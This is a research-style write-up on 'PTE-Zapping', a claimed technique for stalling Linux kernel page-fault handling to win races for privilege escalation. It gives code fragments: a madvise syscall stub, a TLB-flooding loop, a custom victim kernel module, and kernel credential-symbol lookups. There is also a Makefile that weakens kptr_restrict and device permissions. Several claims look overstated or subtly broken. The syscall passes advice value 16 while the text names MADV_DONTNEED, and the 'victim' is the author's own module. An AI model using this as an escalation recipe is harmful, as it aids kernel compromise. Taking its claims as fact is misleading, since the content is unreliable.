Published in March 30, 2026
PTE-Zapping: Exploiting Compositional Vulnerabilities in Linux Kernel Memory Management
Correctness does not imply legitimacy
In this research, we operate under the rigorous assumption that the architectural designs of Page Table Entries (PTE), Inter-Processor Interrupts (IPI), Translation Lookaside Buffers (TLB), and the Memory Management Unit (MMU) are formally correct. The objective is not to refute the integrity of these individual components, but to demonstrate a Compositional Vulnerability that emerges from their functional integration. By treating these systems as a unified state machine, we identify a latent Exploit Gradient that allows an adversary to transform stochastic race conditions into deterministic, controllable execution flows.
1- Introduction
The technique, PTE-Zapping: Deterministic State-Stalling via IPI Bypass, specifically targets the "blind spots" in cross-thread synchronization. While the 4-level page-walk, VA/PA mapping, and memory locking mechanisms may satisfy their localized invariants, their concurrent interaction lacks a global synchronization constant. This architectural overlap permits the programmatic decoupling of memory states. By inducing a controlled IPI-Blindness, we demonstrate that a victim thread (Core 0) can be anchored within a hardware exception path (Page Fault), while an attacker thread (Core 1) executes unauthorized state mutations. This research proves that systemic security is not a sum of its correct parts, but a product of their seamless—and often missing compositional constraints.
2- Memory Subsystem Architecture
To establish the framework for PTE-Zapping, we must first define the operational invariants of the paging subsystem. The architecture relies on the Page Table Entry (PTE) as the fundamental unit of enforcement within the Memory Management Unit (MMU).
2.1- The Page Table Entry (PTE) Definition
The PTE is a structured control object within the hierarchical page table system. Its primary obligation is to maintain a verifiable link between a Virtual Address (VA) and a Physical Address (PA) while enforcing hardware-level access constraints.
2.2- Core Control Bits & Adversarial Relevance
- P (Present) Bit [Bit 0]: Function: Indicates whether the page resides in Physical RAM. If P=0, the MMU triggers a Page Fault (#PF).
Zapping Role: This is the primary trigger for our primitive. By programmatically clearing this bit (Zapping), we force the victim thread into the kernel's exception handling logic, creating the initial execution stall. - R/W & U/S (Protection Bits): Function: Define the Read/Write and User/Supervisor authority levels.
Adversarial Use: These are the target of our state mutation. Once the stall is achieved, we transition these bits to an illegal state (e.g., elevating User to Supervisor or Read to Write). - A (Accessed) & D (Dirty) Bits: Function: Hardware-managed indicators of page utilization and modification status.
Relevance: We monitor these bits to verify "State Anchoring"—ensuring the victim has reached or modified the target page before we initiate the race. - PCD (Page Cache Disable) Bit: Function: Bypasses the CPU cache for the specific page, forcing direct I/O with Physical RAM.
Operational Requirement: For Cross-Thread Violations, we disable caching to ensure that every memory reference (such as fetching an inode or cred structure) is a "Fresh Fetch" from RAM, eliminating cache-coherency delays that might mask the vulnerability. - PWT (Page Write-Through): Function: Forces synchronous writing to both the cache and physical memory.
Relevance: Ensures that our state mutations on Core 1 are immediately visible to the physical backing of the page before the victim on Core 0 resumes. - G (Global) Bit: Function: Prevents the entry from being flushed during a TLB context switch (CR3 reload).
Adversarial Leverage: We manipulate this bit to selectively persist stale mappings in the TLB, facilitating the IPI-Bypass by maintaining a local "false reality" on the target core. - NX (No-Execute) Bit: Function: Prevents instruction fetching from the page.
Adversarial Setup: We explicitly disable this invariant in our research scenarios to allow for arbitrary code execution once the PTE-Zapping provides a stable write primitive.
Structural Invariants of the 4-Level Page Walk
The mapping process follows a non-negotiable traversal: CR3 -> PML4 -> PDP -> PD -> PTE. The Compositional Vulnerability arises because each level assumes that the state of the previous level remains stable throughout the walk. We exploit the absence of a "Locking Constant" that covers the entire duration from the start of the walk to the actual data access.
Inter-Processor Interrupts (IPI) & TLB Shootdown
In a multi-core architecture, the IPI serves as the hardware-level signaling mechanism that allows one CPU core to trigger an action on another. Its most critical obligation in memory management is the TLB Shootdown.
A. The Design Obligation of TLB Shootdown
When Core 1 modifies a PTE (e.g., changing a page from Present to Absent during Zapping), the mapping stored in the TLB (Translation Lookaside Buffer) of Core 0 becomes "Stale" (outdated). To prevent an Illegal State, the kernel must:
- Issue an IPI to all other cores.
- Force the remote cores to stop their current execution.
- Execute a TLB flush (e.g., invlpg or reloading CR3).
B. The Vulnerability Window (The Gap)
The Compositional Vulnerability arises because the IPI is Asynchronous by nature. There is a measurable temporal gap between the moment Core 1 updates the PTE in RAM and the moment Core 0 actually receives and processes the IPI to invalidate its local TLB.
C. IPI-Blindness via TLB Flooding
This research introduces the concept of IPI-Blindness. By saturating Core 0 with high-frequency memory accesses (TLB Flooding), we create "Pipeline Noise". This doesn't necessarily "stop" the IPI, but it delays the core's ability to transition to the interrupt handler.
Adversarial Gradient: We exploit this delay to ensure that Core 0 continues to use the Stale PTE (which it thinks is still valid) while Core 1 has already "Zapped" the underlying physical state.
3- The Zapping Primitive & Deterministic State-Stalling
This chapter details the operational execution of the PTE-Zapping technique. The objective is to transition from the theoretical "Compositional Vulnerability" to a concrete Exploitation Primitive that mandates a controlled stall in the victim’s execution flow.
3.1- The Zapping Mechanism: De-synchronizing VA from PA
The "Zapping" phase is the intentional disruption of the Architectural Invariant that ensures a Virtual Address (VA) points to a valid Physical Address (PA).
- The Procedure: Using memory management syscalls (specifically madvise with MADV_DONTNEED) or direct kernel-mode PTE manipulation, we explicitly clear the Present Bit (Bit 0) of the target page.
- The Result: The Page Table Entry is moved into an Invalid State. However, due to the asynchronous nature of TLB shootdowns, the victim core may still hold a "Ghost Mapping" in its local TLB.
- Adversarial Objective: We aim to keep the victim core "blind" to this update until the exact moment of conflict, ensuring that the next memory access triggers a Hardware Exception (#PF) instead of a standard memory fetch.
asm volatile
(
"movq $0x1C, %%rax\n\t"
"movq %0, %%rdi\n\t"
"movq %1, %%rsi\n\t"
"movq $16, %%rdx\n\t"
"syscall\n\t"
:
: "r" ((unsigned long)address),
"r" ((unsigned long)ALLOC_SIZE)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
3.2- Execution Anchoring: The Page-Fault Trap
The core innovation of PTE-Zapping is Execution Anchoring. By invalidating the PTE, we force the victim thread (Core 0) to exit its high-speed execution path and enter the Kernel’s Page Fault Handler.
- The Trap: When the victim thread attempts to access the "Zapped" address, the MMU fails the translation and raises a Page Fault.
- The Transition: The CPU context-switches into supervisor mode to resolve the fault. This transition is not instantaneous; it involves complex software logic:
- Traversing the vm_area_struct.
- Allocating or re-mapping physical pages.
- Synchronizing locks (e.g., mmap_lock).
- The Anchor: During this period, the victim thread is effectively Anchored (Frozen). Its execution cannot proceed until the kernel "fixes" the memory state.
*(volatile char *)u_addr = *(volatile char *)u_addr;
3.3- Temporal Window Expansion (The Stall)
A standard Page Fault is resolved in microseconds. To achieve a Deterministic Race, we must programmatically expand this temporal window.
- IPI-Bypass/Blindness: By implementing TLB Flooding on the victim core, we delay the processing of the IPI shootdown. This ensures that the victim remains in an inconsistent state for a longer duration.
- Resource Contention: By creating heavy memory pressure or lock contention on the kernel's memory management structures, we force the Page Fault Handler to wait.
- Resultant Gap: This transforms a nanosecond-scale race window into a Millisecond-scale Stall. This expansion provides the attacker (Core 1) with more than enough time to perform "Out-of-band" mutations (e.g., swapping an object, corrupting a refcount, or re-allocating memory) before the victim resumes.
void
tlb_flood
(
void *addr
)
{
//Bypass IPI (Inter-Processor Interrupt)
__asm__ volatile
(
"1:\n\t"
"movq (%0), %%rax\n\t"
"add $4096, %0\n\t"
"movq (%0), %%rbx\n\t"
"sub $4096, %0\n\t"
"lock addl $0, (%%rsp)\n\t"
"jmp 1b\n\t"
:
: "r" (addr)
:"rax",
"rbx",
"memory"
);
}
3.4- Summary of the Primitive Flow
- Zapping: Invalidate the target PTE while the victim is approaching the critical path.
- Flooding: Saturate the TLB to mask the IPI update.
- Trapping: Victim hits the #PF and enters the "Anchor" state.
- Mutating: Attacker modifies the physical backing of the memory.
- Resuming: Kernel resolves the fault, and the victim resumes execution—now operating on Corrupted/Swapped State.
4- Implementation Framework & Environment
To ensure the reliability of the IPI-Bypass and the stability of the Temporal Anchor, the research was validated under a strictly controlled environment.
4.1- Experimental Environment
- Target Kernel: 6.17.0-19-generic (Linux Mainline/Generic).
- Architecture: x86_64 (Multi-core SMP enabled).
- Compiler Toolchain: GCC 13.3.0 (Build: Ubuntu 13.3.0-6ubuntu2~24.04.1).
- Memory Management Protections:
- KPTI (Kernel Page Table Isolation): Enabled. (Verified to ensure isolation does not mitigate the synchronization gap).
- SMAP/SMEP: Active. (The primitive operates via legitimate kernel exception paths, rendering hardware-level access prevention neutral during the stall).
4.2- Technical Note: Primitive Chaining & Attack Surface
The PTE-Zapping technique serves as a "Temporal Enabler" rather than a standalone code-execution exploit:
- Data-Only Exploitation: Sufficient for LPE (e.g., cred manipulation) without additional bypasses, as it does not violate Control-Flow Integrity (CFI).
- Control-Flow Hijacking: Must be chained with secondary bypasses for SMAP/SMEP, Retpoline, and KASLR (e.g., via EntryBleed or ROP/JOP chains).
5- PoC Architecture & Workflow
The Proof-of-Concept is designed as a modular framework to isolate the kernel-level "Victim" logic from the user-space "Attacker" primitive.
5.1- Project Directory Structure
zapping_pte/
├── headers/
│ ├── injection_ioctl.h # Memory allocation sizes and SET_TRAP_ADDRESS IOCTL
│ └── state_machine.h # Error codes and THP (Transparent Huge Pages) state control
├── kernel_module.c # The "Victim" subsystem (handles #PF anchoring)
├── source_code.c # User-space Exploit (Zapping logic & TLB Flooding)
├── argparse.c / .h # Command-line interface for symbol passing
└── Makefile # Automated environment setup and symbol resolution
5.2- Critical Components
- state_machine.h: Enforces hardware-level constraints (e.g., THP_DISABLE) to ensure the victim page is not coalesced, maintaining the 4-level page walk integrity.
- injection_ioctl.h: Establishes the SET_TRAP_ADDRESS command to pin the victim thread to the target memory region.
- Makefile (Automation):
- Symbol Resolution: Dynamically extracts commit_creds and prepare_kernel_cred from /proc/kallsyms.
- Environment Prep: Automatically handles kptr_restrict and device permissions (chmod 666).
5.3- Execution Workflow
To replicate the research findings:
make
make run
6- The Exploitation Flow & Cross-Thread Violation Surface
This chapter defines the operational objective of the PTE-Zapping technique. Rather than a standalone vulnerability, this method serves as an Exploitation Framework designed to create a deterministic "Temporal Gap" between two execution contexts (Core 0 and Core 1). This gap allows for a high-precision Cross-Thread Violation within the Linux Kernel’s subsystems (e.g., File Systems, Device Drivers).
6.1- Defining the Attack Surface
The primitive operates at the intersection of the Hardware MMU and the Kernel's Memory Management (MM) subsystem. By creating a controlled stall, we transform standard kernel operations into vulnerable race conditions.
- Target Scope: Kernel Modules (ExFAT, EXT4, Custom Drivers).
- Violation Type: Cross-thread data corruption (e.g., modifying a cred structure, refcount manipulation, or inducing a Use-After-Free via unlinked objects).
6.2- The Victim Logic: Kernel Module Integration
To demonstrate the attack, we utilize a companion Kernel Module (poc_device). This module acts as the "Victim Subsystem" that the attacker thread will manipulate.
Implementation (The Trap Handler): The module exposes an ioctl interface that allows us to set the "Trap Address" and force its PTE state to be ready for zapping.
static
long
ioctl_handler
(
struct file* file,
unsigned int cmd,
unsigned long arg
)
{
if (cmd == SET_TRAP_ADDRESS)
{
if (!arg) return -EINVAL;
spin_lock(&address_lock);
addressT = arg;
spin_unlock(&address_lock);
int res = force_pte_state(addressT);
return res;
}
return -ENOTTY;
}
6.3- Establishing the Cross-Thread Anchor
The power of this technique lies in pinning threads to specific cores to ensure the TLB shootdown (IPI) can be reliably masked. Our module initializes two kernel threads (kt0 and kt1) bound to separate physical cores.
kt0 = kthread_create(trigger_cpu_0, NULL, "thread_0");
if (!IS_ERR(kt0))
{
kthread_bind(kt0, 0x0);
wake_up_process(kt0);
}
kt1 = kthread_create(trigger_cpu_1, NULL, "thread_1");
if (!IS_ERR(kt1))
{
kthread_bind(kt1, 0x1);
wake_up_process(kt1);
}
6.4- The Window of Opportunity: kernel_write Race
Inside the victim thread (trigger_cpu_0), we create an I/O operation that becomes the "Anchor Point." When the attacker zaps the address used by kernel_write, the execution is suspended inside the kernel's fault handler.
static int trigger_cpu_0(void *data)
{
struct file* filp;
loff_t offset = 0;
char k_buf[32] = "trigger data";
filp = filp_open(PATH_FILE, O_RDWR | O_CREAT, 0644);
if (IS_ERR(filp))
{
return PTR_ERR(filp);
}
while (!kthread_should_stop())
{
if (!addressT)
{
usleep_range(1000, 2000);
continue;
}
// Page Fault injection point
kernel_write(filp, k_buf, sizeof(k_buf), &offset);
if (offset > 100000)
{
offset = 0;
}
cpu_relax();
}
filp_close(filp, NULL);
return 0;
}
6.5- Winning the Race: From Stall to Mutation
While Core 0 is trapped in the Page Fault handler (anchored), the user-space attacker or Core 1 has the "freedom" to modify the physical state. In our LPE scenario, we resolve the kernel symbols for credential management:
prepare_creds_ptr = (void*)lookup("prepare_kernel_cred");
commit_creds_ptr = (void*)lookup("commit_creds");
Summary of the Flow:
- Registration: User-space sends the target address via SET_TRAP_ADDRESS.
- Anchoring: Core 0 enters kernel_write and hits the Zapped PTE, triggering a stall.
- Mutation: Core 1 (Attacker) modifies the sensitive structure (e.g., cred) or swaps the physical page backing.
- Resumption: The Kernel resolves the fault, and Core 0 continues execution, unaware that it is now operating on a "Corrupted" or "Elevated" state.
7- Conclusion & Future Impact
This research has demonstrated that the PTE-Zapping technique is not merely a theoretical curiosity but a potent Architectural Exploit Primitive. By abusing the inherent latency in TLB shootdowns and the deterministic nature of Page Fault handling, we have successfully created a "Temporal Anchor" within the Linux Kernel.
7.1- Key Findings
- Determinism over Randomness: Unlike traditional race conditions that rely on luck, PTE-Zapping allows an attacker to "freeze" a victim thread (Core 0) at a specific instruction (e.g., inside kernel_write) by manipulating the underlying Page Table Entry.
- The Power of the Anchor: We proved that a sub-microsecond race window can be expanded into a millisecond-scale stall through TLB Flooding and Resource Contention.
- Cross-Thread Violation: By utilizing a custom Kernel Module, we showed that any subsystem (File Systems, Network Stacks, Device Drivers) that interacts with user-space memory is potentially vulnerable to this "Out-of-band" state mutation.
7.2- Security Implications
The vulnerability lies in the Compositional Failure between Hardware (MMU) and Software (Kernel Fault Handlers). Current mitigations (like KPTI or SMAP) do not address this, as the attack leverages legitimate architectural features (IPI and #PF).
7.3- Final Summary
The PTE-Zapping primitive introduces a new class of State-Stalling Attacks. It provides the adversary with a "surgical" window to perform memory corruption, credential swapping, or reference count manipulation with high reliability. As long as the gap between PTE invalidation and TLB synchronization exists, the "Ghost Mapping" remains a viable surface for exploitation.
Published in March 30, 2026
